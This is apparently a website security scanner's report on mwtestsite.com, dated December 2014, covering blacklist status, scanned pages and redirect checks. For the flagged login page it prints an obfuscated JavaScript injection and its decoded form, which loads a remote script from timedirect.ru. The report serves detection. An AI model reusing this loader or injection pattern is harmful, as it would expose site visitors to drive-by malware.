Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mwtestsite.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://mwtestsite.com/ | HTTP/1.1 302 Found Cache-Control: private Date: Mon, 29 Dec 2014 13:50:25 GMT Location: /mwtestsite/Login.aspx Server: Microsoft-IIS/7.0 Content-Length: 143 Content-Type: text/html; charset=utf-8 Set-Cookie: ASP.NET_SessionId=p1csyu45nc13vnqprkrjib45; path=/; HttpOnly X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET | clean |
http://mwtestsite.com/mwtestsite/login.aspx | 200 OK Content-Length: 17296 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var IOO='=sTKn4Ddwl2JrcicjN3L84jI3YjNwAjM9QWa/8SbvNmLyVGZuFGcvB3LvoDc0RHai0zYyNHIiQHcpJ3YTFmdhpkI9U2ZhV3ZuFGbgQHcpdyKnI3YzxzJoUGdpJ3duQnbl1Wdj9GZ';var OII=["\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\ ...[768 bytes skipped]... Decoded script: document.write('<scr'+'ipt language="JavaScript" src="http://timedirect.ru/?id=200667"></scr'+'ipt>'); document.write('<scr'+'ipt language="JavaScript" src="http://timedirect.ru/?id=200667"></scr'+'ipt>'); Antivirus reports:
| ||
http://mwtestsite.com/mwtestsite/WebResource.axd?d=UvecD4ThJdaixfUXo2tmLbb1vOp82tnehTpZrsC4IQFZzJTIAytiixCpO6MH3n2VbIc_d8E33sxnmypIdkKzvbH6_Zg1&t=635315753528827089 | 200 OK Content-Length: 20794 Content-Type: application/x-javascript | clean |
http://mwtestsite.com/mwtestsite/ScriptResource.axd?d=8_qBcOy9jpzMbeEFi22nbigpxZ2-X0RgbLk92Wm6SQsxuul9xxi8ILZJjM044BD2qkrc7YHq5wo2zuBs4S9D9E87x8Dk9YcPC34oRhrK5BRvpwuuUzGqxEKv2UJu1gyhi8-AGy2EES_pXuZLr48IxbB2Bqs1&t=635315753528827089 | 200 OK Content-Length: 21618 Content-Type: application/x-javascript | clean |
http://mwtestsite.com/mwtestsite/ScriptResource.axd?d=KA6Ne0VdyrJn8jpO2Tt3OmJaDAScIwWUQzF7pmUK8dNRUQalkeXjlybKPjzE4CDyh4rj5ZQXx94L1GDgheNgzDWKo5Q4rZoR5W1q310YE5KF2agDzL57-ihHdzYfrIwocV2k9pAm6rxaPYAwUmNBEaud8WiZKGEMl_iQJOw3EZR2z0ru0&t=634088295413488828 | 200 OK Content-Length: 260386 Content-Type: application/x-javascript | clean |
http://mwtestsite.com/mwtestsite/ScriptResource.axd?d=UIUoA-NWGJIFfX-5d0l6q7oVq3RtDn7Zn3Q1n15bn1-R4VHlfSvmhhZsMEH7a0vLogbjgtX7M3q8oIunV3ZVjtXFgx32BgQwH7il13GIh5y7h2EeAgJjkj77hbtv0VjLB9myibCyrkrjHT9wAARqC9-2tWmfYCbd9iYTf3qEmK74sdys0&t=634088295413488828 | 200 OK Content-Length: 65868 Content-Type: application/x-javascript | clean |
http://mwtestsite.com/mwtestsite/WebResource.axd?d=bljL002ImsXatiMQUrldBHOfwBQtic1U1HjCYnI3Wlg8URkAANoGMnbMgsMNvbj5uE1N5oWBKgsKVhEg3EAqxqOS4IM1&t=635315753528827089 | 200 OK Content-Length: 3005 Content-Type: application/x-javascript | clean |
http://mwtestsite.com/test404page.js | 404 Not Found Content-Length: 1549 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mwtestsite.com
Result:
HTTP/1.1 302 Found
Cache-Control: private
Date: Mon, 29 Dec 2014 13:50:25 GMT
Location: /mwtestsite/Login.aspx
Server: Microsoft-IIS/7.0
Content-Length: 143
Content-Type: text/html; charset=utf-8
Set-Cookie: ASP.NET_SessionId=p1csyu45nc13vnqprkrjib45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
...143 bytes of data.
GET / HTTP/1.1
Host: mwtestsite.com
Result:
HTTP/1.1 302 Found
Cache-Control: private
Date: Mon, 29 Dec 2014 13:50:25 GMT
Location: /mwtestsite/Login.aspx
Server: Microsoft-IIS/7.0
Content-Length: 143
Content-Type: text/html; charset=utf-8
Set-Cookie: ASP.NET_SessionId=p1csyu45nc13vnqprkrjib45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
...143 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mwtestsite.com
Referer: http://www.google.com/search?q=mwtestsite.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mwtestsite.com
Referer: http://www.google.com/search?q=mwtestsite.com
Result:
The result is similar to the first query. There are no suspicious redirects found.